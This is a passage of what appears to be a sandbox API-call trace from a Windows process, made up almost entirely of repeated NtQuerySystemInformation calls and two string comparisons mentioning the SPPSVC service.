SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.486] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.495] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.520] NtQuerySystemInformation (SystemInformationClass=0xb9, 